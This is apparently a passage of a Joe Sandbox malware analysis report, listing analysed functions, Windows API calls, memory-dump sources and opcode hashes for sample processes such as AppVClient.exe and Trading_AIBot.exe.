Instruction ID: 9d002454ab3db2d6ec74a603e319dc5d1dc279c8f97fa1103303d10669b1f81c
Opcode Fuzzy Hash: 32abf38ce21314e5ff3708ee07ec651271f955f8e77437083cf368a70e9827e3
Instruction Fuzzy Hash: 1F41AFB1D10349DFDF14DFA9C984ADEBBB5BF48314F24812AE819AB210D771A885CF91

Function 05583A7C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05587221

Memory Dump Source

Source File: 0000000A.00000002.2032578173.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5580000_zeXKjViL.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 2636788c4cfb90ad78522b22f1496aaa3904df29a83b5dd61e1f459027931e3c
Instruction ID: fbf8f1cde5472a9ffff53bcb33e3a646701e4363845b0727aad2be6c446fde65
Opcode Fuzzy Hash: 2636788c4cfb90ad78522b22f1496aaa3904df29a83b5dd61e1f459027931e3c
Instruction Fuzzy Hash: D74109B5A102098FCB14DF99C488AAAFBF5FF88314F24C859E519A7321D735A845CFA4

Function 01326ECC Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 01328829

Memory Dump Source

Source File: 0000000A.00000002.1953547630.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1320000_zeXKjViL.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2ec30851f658844b530bb3443476f46257b696af929bdc2ec531c9a5f1349e02
Instruction ID: 11581e2a664fc35eba8ba61089fd2848c4ae0508a98a5de8c83e26e078d1d233
Opcode Fuzzy Hash: 2ec30851f658844b530bb3443476f46257b696af929bdc2ec531c9a5f1349e02
Instruction Fuzzy Hash: BD41D2B0C0061DCBDB24DFA9C8447DEBBF5BF48308F2484AAD508AB255DBB55945CF90

Function 0558B8A0 Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 0558B93F

Memory Dump Source

Source File: 0000000A.00000002.2032578173.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5580000_zeXKjViL.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 16299ae8a070de8e271499b3c52fd395b04c90da95bd25bfb6697639120a8c84
Instruction ID: 596158d0b21cc65daa6e0d2193ae3566dfdcda824c6092d76fe2521fce6528dc
Opcode Fuzzy Hash: 16299ae8a070de8e271499b3c52fd395b04c90da95bd25bfb6697639120a8c84
Instruction Fuzzy Hash: AB21C0B5D012099FDB10DF99D984AEEFBF9FB48320F14842AE919A7310D775A944CFA0

Function 0558B8A8 Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 0558B93F

Memory Dump Source

Source File: 0000000A.00000002.2032578173.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5580000_zeXKjViL.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 8c7d42dbd268987cd4e79b7410fb8eb7ade6a69b8a26f95c26239caa16c532fe
Instruction ID: 7f0c628b9756c23bf13f89e54bda15c96d37ed335e95c5581473c9eb0a908d40
Opcode Fuzzy Hash: 8c7d42dbd268987cd4e79b7410fb8eb7ade6a69b8a26f95c26239caa16c532fe
Instruction Fuzzy Hash: 9C21C3B5D002099FDB10DF9AD884AAEFBF9FB48320F14842AE919A7310D774A544CFA0

Function 09433632 Relevance: 1.5, APIs: 1, Instructions: 48
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 09433695

Memory Dump Source

Source File: 0000000A.00000002.2062330548.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9430000_zeXKjViL.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 4a2f6434230dced4c1bf0786a72e6f64726e84bf5109acbee8b034c345a5aeae
Instruction ID: 70456f5a11e0597caab7128822d515e4807b672be2f4e0d6fe53a843d26b6490
Opcode Fuzzy Hash: 4a2f6434230dced4c1bf0786a72e6f64726e84bf5109acbee8b034c345a5aeae
Instruction Fuzzy Hash: 8111F5B58002489FDB10DF99D848BDEBFF4EB48324F10841AE859A7310C375A544CFA1

Function 0132E260 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0132E2C6

Memory Dump Source

Source File: 0000000A.00000002.1953547630.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1320000_zeXKjViL.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e0d29a309dce4aa84c65a9907ff56aae1951cdb847689486b0ebe947551dbd1f
Instruction ID: 3cbbfc9b1b3195d26f337b108e9718eed45f25b39f2ff8ef426165e275993482
Opcode Fuzzy Hash: e0d29a309dce4aa84c65a9907ff56aae1951cdb847689486b0ebe947551dbd1f
Instruction Fuzzy Hash: FF1140B5C003198FDB14EF9AC848ADEFBF4AB89324F10842AC819B7300C375A544CFA0

Function 09433669 Relevance: 1.5, APIs: 1, Instructions: 30
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 09433695

Memory Dump Source

Source File: 0000000A.00000002.2062330548.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9430000_zeXKjViL.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e033714b8e4b3b3ffb1e3b523520e471becab49cb452e76bfa424aaa11d54bed
Instruction ID: bb8fc46c7213352dcce38b6f1370d2c0ebb9ccc7f25ee6de33adbdedb260b1f4
Opcode Fuzzy Hash: e033714b8e4b3b3ffb1e3b523520e471becab49cb452e76bfa424aaa11d54bed
Instruction Fuzzy Hash: 12F0C4B58002099FDB10CF99D448BDEBBF4AB58324F10C41AE558A7210C375A594CFA1

Function 012CD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1950730032.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12cd000_zeXKjViL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1f1f632066b9bbec5548f7d943f05c7649789b0ade2e97a6727d05dd68728b8
Instruction ID: 62a3ac8d5d63f5f207c2427facc11354e611b78ed677a4be9956a7d09404b288
Opcode Fuzzy Hash: c1f1f632066b9bbec5548f7d943f05c7649789b0ade2e97a6727d05dd68728b8
Instruction Fuzzy Hash: F0213371550208DFCB11DF58E9C0B26BF65FB98B18F20C27DEA090B256C336D446CAE1

Function 012CD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1950730032.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12cd000_zeXKjViL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 396cc538599b4d74b6ba8a8aa9e8da7046fc4b0dca8978f005104d91cae0cd01
Instruction ID: fef700a294f8ef028209d5fb063101c7e67986fda7e94239ccf602d5ecca81c7
Opcode Fuzzy Hash: 396cc538599b4d74b6ba8a8aa9e8da7046fc4b0dca8978f005104d91cae0cd01
Instruction Fuzzy Hash: FD21FEB5110208DFDB11DF48C9C0B66BB65EB88724F20C27DEB094A256C336E446CAA1

Function 012DD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1950961233.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12dd000_zeXKjViL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aaeeb150456e8804172782a2d223454c32e0062c047ea41170bf8f3f1d98488
Instruction ID: 6f8cc4c8ed390192efa2053b0a24ad6fdd01fec6ea2eba34e7b01a44a8d268d0
Opcode Fuzzy Hash: 1aaeeb150456e8804172782a2d223454c32e0062c047ea41170bf8f3f1d98488
Instruction Fuzzy Hash: 51214270214608DFCB11DF68D980B26BFA5EBC8315F20C56DD90A4B296C37AD407CA61

Function 012DD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1950961233.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12dd000_zeXKjViL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af6ddf145e21f4ff67f9a05b9a570f11e418fdf2a28063cb6309b123ecd3dcb8
Instruction ID: 97f78620ef2e72f0dde2721ba1d06da878ba296a6dd49d1ab600e30c643a6887
Opcode Fuzzy Hash: af6ddf145e21f4ff67f9a05b9a570f11e418fdf2a28063cb6309b123ecd3dcb8
Instruction Fuzzy Hash: 12214671554608EFDB01DFA8C9C8B26BFA5FB84324F20C66DE9094B297C376D846CA61

Function 012DD006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1950961233.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12dd000_zeXKjViL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fb7bddd7a7c9fd8b2d0cbd20e71790f0e897eb0841281abafccf4fc2cb0fd26
Instruction ID: bc1386dd01154f1cd2fd93549fd297f22719234138cbba988556de5f8b686793
Opcode Fuzzy Hash: 5fb7bddd7a7c9fd8b2d0cbd20e71790f0e897eb0841281abafccf4fc2cb0fd26
Instruction Fuzzy Hash: D621D1755083848FCB03CF24C990711BF71EB85314F28C5EAD9498B2A7C33AD40ACB62

Function 012CD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1950730032.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12cd000_zeXKjViL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: d576e73b1cb844f5849ae709227b1d4fa0f81980b4a3743ff840a7b07b7afb96
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 8C11E176404284CFCB12CF54E9C4B16BF71FB94718F24C6ADDA090B256C336D45ACBA1

Function 012CD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1950730032.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12cd000_zeXKjViL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 987b9dc3b30d26108252c0e35849812bc2f2595bd8c0bf6e2aadd9375e111eeb
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 3B11CA76404284DFDB12CF44D9C4B56BF72FB94224F24C2ADDA090A256C33AE45ACBA2

Function 012DD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1950961233.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12dd000_zeXKjViL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 14b0c2a2760bc6d5fc6f812389c7c09b46a069fa000b8c7f05e1cab3bc19d548
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 5911BB75544684DFDB02CF54C5C8B15BFB1FB84224F24C6AAD9494B697C33AD40ACB61

Function 012CD745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1950730032.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12cd000_zeXKjViL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4fbff774d6c2be1c7a4b2b13308911a262bfebf378e47288944d793ad9c5b6c
Instruction ID: 54461ec4a2760d7ca1af350d16c323c18d0ab19b969ae85235ab6c46d5035011
Opcode Fuzzy Hash: a4fbff774d6c2be1c7a4b2b13308911a262bfebf378e47288944d793ad9c5b6c
Instruction Fuzzy Hash: 23012B311183889AE7155EA9CDC4B67FF98DF41B24F18C63EEF090A286C279D844C6F1

Function 012CD744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1950730032.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_12cd000_zeXKjViL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5637c831c9e1fef9c621f9cc74bc3908356f38b759c8f61b82b0a13b5b142aeb
Instruction ID: 9daf28f692e658b8ffb812783e15a607648414648e4ffeb10c32ece72b040311
Opcode Fuzzy Hash: 5637c831c9e1fef9c621f9cc74bc3908356f38b759c8f61b82b0a13b5b142aeb
Instruction Fuzzy Hash: B0F068715043449EE7159E5ACCC8B62FFA8EB41734F18C55EEE484A286C2759844CAB1

Analysis Process: AppVClient.exePID: 7460, Parent PID: 620COMMON

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	97.9%
Signature Coverage:	4.3%
Total number of Nodes:	94
Total number of Limit Nodes:	10

Executed Functions

Function 00B152A0 Relevance: 1.6, APIs: 1, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDefaultLangID.KERNELBASE ref: 00B153C4

Memory Dump Source

Source File: 0000000F.00000002.1740594504.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_AppVClient.jbxd

Similarity

API ID: DefaultLangSystem
String ID:
API String ID: 706401283-0
Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
Instruction ID: 567ab531e36b06aaf6cef039aa4213df7661d0fa140291a587d6d1c06bfb28b7
Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
Instruction Fuzzy Hash: 0241B46241DE95CFD73A422468A42F07BE0DB923A2FDD04E7D4E3C71E6D1A85CC1936A

Function 00B30080 Relevance: 5.0, APIs: 3, Instructions: 466
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameW.KERNEL32 ref: 00B303E0

Memory Dump Source

Source File: 0000000F.00000002.1740594504.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_AppVClient.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
Instruction ID: a482213db9b2e0bc4c833df859b9567399ecd68b110d06e34e977a844067b0ba
Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
Instruction Fuzzy Hash: 11D10531428F0D8BC728FF58D8957EAB7E1FFA0310F28469EE846C3264DA74964587C2

Function 00B18070 Relevance: 4.7, APIs: 3, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.1740594504.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_AppVClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
Instruction ID: 6d3d69c43a76cbb79b0be27f1c16ccdbfc1cc12a734981460f18c74c0f171446
Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
Instruction Fuzzy Hash: FD61473250CA49AFC7668B2898987F57BE1FB5D350FE802DAE446D31A0DF344CD58392

Function 00B15910 Relevance: 1.9, APIs: 1, Instructions: 607
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.1740594504.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_AppVClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
Instruction ID: c86623dd15e431b7f1518f9efa52e135d17aa7f9559817b9a01ef62bbd585fbb
Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
Instruction Fuzzy Hash: 24F10A3171CE58CFC769A71C68816BA77D2EBD9310FA846DED04EC3297DD249C468382

Function 00B15B42 Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.1740594504.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_AppVClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
Instruction ID: 3e14b0f22196b1c74b942db9a03c67b504654d692119eaac2bd060765f9568b5
Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
Instruction Fuzzy Hash: 5721AE3020CF45CFCB799F189898BF56AE1EBD5310FE801E68447CF2A6CA249CC49396

Function 00B15B09 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.1740594504.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_AppVClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
Instruction ID: 91632e0bc15f6996493c619df13a944c8d28e62f1678bc17592af865e9825ece
Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
Instruction Fuzzy Hash: E601C07010DF46CFDB755E24AC987FA6BE0EBD1324FE501EB8487CA091DAA449C0A792

Function 00B15B87 Relevance: 1.5, APIs: 1, Instructions: 23
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE ref: 00B15B90
CreateThread.KERNELBASE ref: 00B15CDF

Memory Dump Source

Source File: 0000000F.00000002.1740594504.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_AppVClient.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
Instruction ID: f115bc26a86017fb9e6d2ccb11b381b34155a7f297735a8a4c9f93dd644d4aea
Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
Instruction Fuzzy Hash: 64E08C3060DB48CFDB6A9F249D6036A3AE5EBC8314F5902CFC48ADB1D1DF690D468792

Function 00B1599B Relevance: 1.3, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcscpy.LIBCMT ref: 00B159D9

Memory Dump Source

Source File: 0000000F.00000002.1740594504.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_AppVClient.jbxd

Similarity

API ID: wcscpy
String ID:
API String ID: 1284135714-0
Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
Instruction ID: 9120ffe34ceebeda7ebf540127ecca9a0b95ce4dbac5763fe0392e67e7a47e6c
Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
Instruction Fuzzy Hash: D301D67056DE84CFD6769B1854912F966D2FBD43A0FE805D6908ACB092C9244EC0A743

Function 00B18090 Relevance: 1.3, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 00B18186

Memory Dump Source

Source File: 0000000F.00000002.1740594504.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_AppVClient.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
Instruction ID: f60023cfbd6d191ad8989aa80b9ead36d733b0a0263fdaf05cf80be0934b25d3
Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
Instruction Fuzzy Hash: 0CC08C63228902F6523A02582C4F0F026C0F30F7A0BEC00CAEC06B0220ED248EF300A7

Function 00B1817F Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 00B18186

Memory Dump Source

Source File: 0000000F.00000002.1740594504.0000000000B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_AppVClient.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
Instruction ID: 021b111d36429bed50892296e30bf6594da9118aaf425d03ef74051aecf669e8
Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
Instruction Fuzzy Hash: D2C04C62554505B6513626996C0A4E125D0A71B760B9C4492FC1676260E9544DE241A2

Analysis Process: Trading_AIBot.exePID: 3448, Parent PID: 8160COMMON

Executed Functions

Function 02B77687 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91d9a9d686af75efa5aac8b0fa10dadefcaf1d985f42583fe1f804f47d19fd24
Instruction ID: 619f0ccbf94a47dfac3229d15e1af4a0c4b4f41cb2087ae99effa910e4c6aaf7
Opcode Fuzzy Hash: 91d9a9d686af75efa5aac8b0fa10dadefcaf1d985f42583fe1f804f47d19fd24
Instruction Fuzzy Hash: F061D174D00219DFDB14EFA4D990AADBBB2FF89300F2085A8D4197B364DB35698ACF50

Function 02B77187 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cd5121d236de58892c3dbdae6d49186bae4e2f9557d244d93af533338c29287
Instruction ID: 163ba3b96e636f8ae6506150b77809164b1cbb54a418b32b508c65bbfa874d3d
Opcode Fuzzy Hash: 6cd5121d236de58892c3dbdae6d49186bae4e2f9557d244d93af533338c29287
Instruction Fuzzy Hash: 8461E378A40208CFDB44DFA8D5949ADBBF2FF49310F1190A9E815AB369CB30AC06CF10

Function 02B77E60 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 336ee8fd92b6a9ccca834ad527c11bda9f6bee9c63d0cb3adfbaa82e99b3ef0f
Instruction ID: 90604850219de19c88edbf3c1278f6ad1c6ebcd90d3126f005cda82175d80e80
Opcode Fuzzy Hash: 336ee8fd92b6a9ccca834ad527c11bda9f6bee9c63d0cb3adfbaa82e99b3ef0f
Instruction Fuzzy Hash: 3D41CBB0D00298DFDB10CFAAC984ADEFBF6AF48310F24806AE419AB254DB349945CF44

Function 02B77E5F Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0891e90abebf9905e725a497a21b27ffba814f50a2220564a2dda615ad1cde94
Instruction ID: 58a2fe50434e9c20521e5b6bf136b83d6cf003991b4c61f924a9462a51e77e21
Opcode Fuzzy Hash: 0891e90abebf9905e725a497a21b27ffba814f50a2220564a2dda615ad1cde94
Instruction Fuzzy Hash: 1F41BFB0D00298DFDB14CFA9C984ADDFBB5AF48314F24806AE459BB254DB749945CF44

Function 02B774F2 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

Jeq, xrefs: 02B77611

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID: Jeq
API String ID: 0-1775949608
Opcode ID: 562c97e93ed73088ea85f19afb4093930388ada1756af168b2ae43b6870d5901
Instruction ID: ffece0c9029fe7e5dd1ade4399b60a9e287fdc86d88dc50a878f9dd7e72fdf28
Opcode Fuzzy Hash: 562c97e93ed73088ea85f19afb4093930388ada1756af168b2ae43b6870d5901
Instruction Fuzzy Hash: 0E410375E002089FCB58DFA8D494AEEBBF6EF89301F1080A9E415B73A4DB359905CF90

Function 02B75357 Relevance: .9, Instructions: 935COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a6cfdd468928b48d657a19bad221e55461f551f942f20239c39ea677a5ea6d
Instruction ID: 58a45c908e1d26f0d79bc48de774e053fcb89680ce0b982d2d36eca309dedbaf
Opcode Fuzzy Hash: a6a6cfdd468928b48d657a19bad221e55461f551f942f20239c39ea677a5ea6d
Instruction Fuzzy Hash: A9B2BE70E112689FCB64EF68C894A9DBBB2BF49304F5085E9D41DA7364DB325E86CF40

Function 02B75358 Relevance: .9, Instructions: 935COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2183024292.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2b70000_Trading_AIBot.jbxd

Similarity

API ID:
String ID:
API String ID:
